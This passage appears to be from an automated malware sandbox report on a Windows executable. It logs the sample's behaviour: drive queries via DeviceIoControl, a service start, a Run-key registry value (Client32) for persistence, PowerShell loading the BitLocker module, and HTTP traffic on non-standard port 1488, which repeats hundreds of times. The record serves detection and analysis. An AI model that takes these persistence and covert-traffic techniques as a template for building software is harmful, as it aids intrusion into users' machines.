                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: PyDict_New,swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,Py_BuildValue,PyDict_SetItemString,_Py_Dealloc,CloseHandle,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,PyErr_SetFromWindowsErr,_Py_Dealloc,_Py_Dealloc,CloseHandle, PhysicalDrive%i1_2_00007FFE10302B00
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: PyDict_New,swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,Py_BuildValue,PyDict_SetItemString,_Py_Dealloc,CloseHandle,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,PyErr_SetFromWindowsErr,_Py_Dealloc,_Py_Dealloc,CloseHandle, DeviceIoControl -> ERROR_INVALID_FUNCTION; ignore PhysicalDrive%i1_2_00007FFE10302B00
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: PyDict_New,swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,Py_BuildValue,PyDict_SetItemString,_Py_Dealloc,CloseHandle,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,PyErr_SetFromWindowsErr,_Py_Dealloc,_Py_Dealloc,CloseHandle, DeviceIoControl -> ERROR_NOT_SUPPORTED; ignore PhysicalDrive%i1_2_00007FFE10302B00
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE10308B10 PyArg_ParseTuple,StartServiceA,CloseServiceHandle,CloseServiceHandle,_Py_NoneStruct,_Py_NoneStruct,1_2_00007FFE10308B10
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Client32Jump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Client32Jump to behavior

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Loading BitLocker PowerShell Module
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                Uses known network protocols on non-standard ports
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1488 -> 49733
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1488 -> 49733
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
